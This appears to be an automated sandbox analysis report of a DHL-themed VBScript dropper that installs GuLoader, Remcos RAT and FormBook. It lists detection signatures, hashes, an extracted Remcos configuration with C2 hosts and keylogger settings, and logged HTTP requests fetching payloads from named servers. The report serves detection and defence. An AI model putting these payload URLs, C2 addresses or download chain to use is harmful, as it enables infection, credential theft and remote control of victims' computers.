Windows Analysis Report
DHL_ES567436735845755676678877988975877.vbs

Overview

General Information

Sample name: DHL_ES567436735845755676678877988975877.vbs
Analysis ID: 1431984
MD5: d0d8e78e99c4c59061e7caa5d254e8e9
SHA1: f06eff42be48b3ff12d8597fc4a155a293ed4236
SHA256: 0895ad5d19828edc6d17054edb6d9eebdec60e587167716f2271bd683290aaf8
Tags: vbs
Infos:

Detection

FormBook, GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses cmd line tools excessively to alter registry or file data
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Formbook, Formbo FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
 https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://geoplugin.net/json.gp URL Reputation: Label: phishing
Source: jgbours284hawara01.duckdns.org Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Multi AV Scanner detection for domain / URL
Source: jgbours284hawara01.duckdns.org Virustotal: Detection: 6% Perma Link
Source: jgbours284hawara01.duckdns.org Virustotal: Detection: 6% Perma Link
Source: http://87.121.105.163 Virustotal: Detection: 18% Perma Link
Multi AV Scanner detection for submitted file
Source: DHL_ES567436735845755676678877988975877.vbs ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match File source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Yara detected Remcos RAT
Source: Yara match File source: 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
Source: unknown HTTPS traffic detected: 188.212.111.134:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 46.254.34.12:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: Binary string: System.Core.pdbF! source: powershell.exe, 00000016.00000002.2899923505.0000000008681000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gqm.Core.pdb source: powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdbq source: powershell.exe, 00000005.00000002.2489484769.00000000086E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1989736522.000001A47F191000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1991997565.000001A47E636000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2498526890.000000000351D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2494277320.00000000059E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2469252560.00000000075C9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2899923505.0000000008681000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2469252560.0000000007622000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbTe= source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5c}c source: powershell.exe, 00000016.00000002.2885377459.0000000007413000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb7} source: powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2469252560.00000000075C9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5eU source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000016.00000002.2885377459.0000000007413000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222E10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 8_2_222E10F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222E6580 FindFirstFileExA, 8_2_222E6580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040AE51 FindFirstFileW,FindNextFileW, 16_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 19_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 20_2_00407898
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WCN\en-GB\
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.5:49715 -> 45.88.90.110:3050
Source: Traffic Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 45.88.90.110:3050 -> 192.168.2.5:49715
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: jgbours284hawara01.duckdns.org
Uses dynamic DNS services
Source: unknown DNS query: name: jgbours284hawara01.duckdns.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49715 -> 45.88.90.110:3050
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 87.121.105.163 87.121.105.163
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: LVLT-10753US LVLT-10753US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: global traffic HTTP traffic detected: GET /Methink1.thn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: europrotectie.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /FIPWKWOaFXJGe178.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: duelvalenza.itCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /FIPWKWOaFXJGe178.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: www.duelvalenza.itConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /Detentionen.java HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /PUzAKuQ35.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /abt9/?Uzgp=d6Th&InLTkv7P=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA== HTTP/1.1Host: www.387mfyr.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: wab.exe, 00000010.00000003.2531648040.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2534668907.00000000033D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wab.exe, 00000010.00000003.2531648040.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2534668907.00000000033D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wab.exe, 00000008.00000002.3327352353.00000000222B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: wab.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: wab.exe, 00000008.00000002.3327479336.0000000022380000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wab.exe, 00000008.00000002.3327479336.0000000022380000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: europrotectie.ro
Source: global traffic DNS traffic detected: DNS query: duelvalenza.it
Source: global traffic DNS traffic detected: DNS query: www.duelvalenza.it
Source: global traffic DNS traffic detected: DNS query: jgbours284hawara01.duckdns.org
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: global traffic DNS traffic detected: DNS query: www.387mfyr.sbs
Source: global traffic DNS traffic detected: DNS query: www.led-svitidla.eu
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 05:41:49 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: powershell.exe, 0000000E.00000002.3202569251.0000000004FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3202569251.0000000004AF7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163
Source: powershell.exe, 0000000E.00000002.3202569251.0000000004AF7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/Detentionen.javaXRwl
Source: powershell.exe, 00000016.00000002.2824348491.0000000004B27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/Detentionen.javaXRwl4
Source: powershell.exe, 0000000E.00000002.3202569251.0000000004FCF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.108
Source: powershell.exe, 0000000E.00000002.3192791124.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mM5
Source: powershell.exe, 0000000E.00000002.3263668974.0000000007340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000005.00000002.2469252560.000000000758E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microD
Source: powershell.exe, 00000002.00000002.2707049436.00000214ABB20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: powershell.exe, 00000002.00000002.2568004154.000002149582A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://europrotectie.ro
Source: wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.00000000064AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp)B
Source: wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.00000000064AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp0B8
Source: wab.exe, 00000008.00000003.2493965045.000000002247C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpf
Source: powershell.exe, 00000002.00000002.2692569252.00000214A36AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2568004154.0000021493641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2457149588.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3202569251.00000000049A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2824348491.00000000049D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.duelvalenza.it/FIPWKWOaFXJGe178.bin
